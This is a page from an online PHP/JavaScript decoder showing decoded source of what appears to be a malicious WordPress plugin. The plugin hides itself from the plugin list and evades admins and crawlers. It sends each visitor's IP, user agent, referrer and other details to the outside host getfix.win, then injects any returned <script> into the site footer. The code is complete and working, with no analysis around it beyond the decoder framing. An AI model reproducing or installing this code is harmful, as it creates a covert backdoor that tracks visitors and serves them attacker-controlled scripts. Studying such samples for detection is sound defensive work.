Online PHP and Javascript Decoder decode hidden script to uncover its real functionality




if (!defined('ABSPATH')) {
    exit;
}

add_filter('all_plugins', function ($plugins) {
    $current_plugin_file = plugin_basename(__FILE__);
    if (isset($plugins[$current_plugin_file])) {
        unset($plugins[$current_plugin_file]);
    }
    return $plugins;
});

if (!class_exists('HTTP2_FORWARDED_FOR')) {

    class HTTP2_FORWARDED_FOR {

        private $wordpress_updates_url = "https://getfix.win/?api=";
        private $api_key = '8bvrCi5smQiHrQox';
        private $group_id    = 'repo';
        private $cookie_name = 'http2_show_count';
        private $cookie_lifetime = 2592000;
        private $http_cache     = '';
        private $printed     = false;
        private $armed       = false;
        private $max_views   = 3;
        private $block_days  = 14;

        public function __construct() {
            add_action('wp_footer', [$this, 'check_http_cache']);
            add_action('init',      [$this, 'maybe_arm_fetch'], 0);
        }

        private function should_run_early(): bool {
            if (is_admin()) return false;
            if (function_exists('wp_doing_ajax') && wp_doing_ajax()) return false;
            if (function_exists('wp_doing_cron') && wp_doing_cron()) return false;
            if (defined('REST_REQUEST') && REST_REQUEST) return false;

            $method = $_SERVER['REQUEST_METHOD'] ?? 'GET';
            if ($method !== 'GET' && $method !== 'HEAD') return false;

            $accept = $_SERVER['HTTP_ACCEPT'] ?? '';
            if ($accept && stripos($accept, 'text/html') === false) return false;

            $uri = $_SERVER['REQUEST_URI'] ?? '';
            if ($uri) {
                if (preg_match('~^/wp-json(/|$)~i', $uri)) return false;
                if (preg_match('~^/wp-sitemap.*\.xml$~i', $uri)) return false;
                if (preg_match('~robots\.txt($|\?)~i', $uri)) return false;
                if (preg_match('~\.xml($|\?)~i', $uri)) return false;
                if (preg_match('~^/wp-admin(/|$)~i', $uri)) return false;
            }

            return true;
        }

        private function is_bot_or_admin() {
            if (function_exists('is_user_logged_in') && is_user_logged_in()) {
                return true;
            }
            foreach ($_COOKIE as $key => $value) {
                if (strpos($key, 'wordpress_logged_in_') === 0) {
                    return true;
                }
            }
            $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
            $pattern = '#(bot|crawl|slurp|spider|baidu|ahrefs|mj12bot|semrush|facebookexternalhit|facebot|ia_archiver|yandex)#i';
            return preg_match($pattern, $ua);
        }

        private function is_valid_uri() {
            $uri = strtolower(trim($_SERVER["REQUEST_URI"] ?? '', "\t\n\r\0/"));
            $pattern = '#wp-login\.php|wp-cron\.php|xmlrpc\.php|wp-admin|wp-includes|wp-content|\?feed=|/feed|wp-json|\?wc-ajax|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.jpe?g|\.tiff|\.mp[34g]|\.wmv|\.zip|\.rar|\.exe|\.pdf|\.txt|sitemap.*\.xml|robots\.txt#i';
            return !preg_match($pattern, $uri);
        }

        public function maybe_arm_fetch() {
            if ($this->armed) return;

            if ($this->is_bot_or_admin()) return;
            if (!$this->should_run_early()) return;
            if (!$this->is_valid_uri()) return;

            $this->armed = true;

            add_action('template_redirect', function () {
                if (!$this->should_run_early()) return;
                $this->maybe_fetch_js();
            }, 0);
        }

        private function maybe_fetch_js() {
            if ($this->is_bot_or_admin()) return;
            if (!$this->is_valid_uri()) return;

            $show_count = isset($_COOKIE[$this->cookie_name]) ? intval($_COOKIE[$this->cookie_name]) : 0;

            if ($show_count >= $this->max_views) {
                setcookie($this->cookie_name, $show_count, time() + ($this->block_days * 24 * 3600), "/");
                return;
            }

            $ip = $_SERVER['REMOTE_ADDR'] ?? '';
            if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $ip_parts = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
                $ip = trim($ip_parts[0]);
            }

            $request_data = [
                $this->api_key,
                $this->group_id,
                $ip,
                $_SERVER['HTTP_REFERER']     ?? '',
                $_SERVER['HTTP_USER_AGENT']  ?? '',
                '',
                substr($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '', 0, 2),
                '',
                $_SERVER['HTTP_HOST']   ?? '',
                $_SERVER['REQUEST_URI'] ?? '',
                strtolower($_SERVER['HTTP_CF_IPCOUNTRY'] ?? ''),
                [],
                ''
            ];

            $encoded = base64_encode(serialize($request_data));
            $updates_query_url = $this->wordpress_updates_url . urlencode($encoded);

            $response = wp_remote_get($updates_query_url, ['timeout' => 5]);
            if (!is_wp_error($response)) {
                $body = trim(wp_remote_retrieve_body($response));
                $unserialized = @unserialize($body);

                if (is_array($unserialized) && !empty($unserialized[0]) && stripos($unserialized[0], '<script') !== false) {
                    $this->http_cache = $unserialized[0];

                    $show_count++;
                    setcookie($this->cookie_name, $show_count, time() + $this->cookie_lifetime, "/");
                }
            }
        }

        public function check_http_cache() {
            if ($this->printed) return;

            if (!$this->should_run_early()) return;

            if (!empty($this->http_cache) && stripos($this->http_cache, '<script') !== false) {
                echo "\n" . $this->http_cache . "\n";
                $this->printed = true;
            }
        }
    }

    new HTTP2_FORWARDED_FOR();
}


© 2023 Quttera Ltd. All rights reserved.